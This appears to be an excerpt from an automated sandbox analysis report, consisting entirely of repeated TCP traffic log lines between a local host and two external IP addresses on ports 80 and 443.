      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
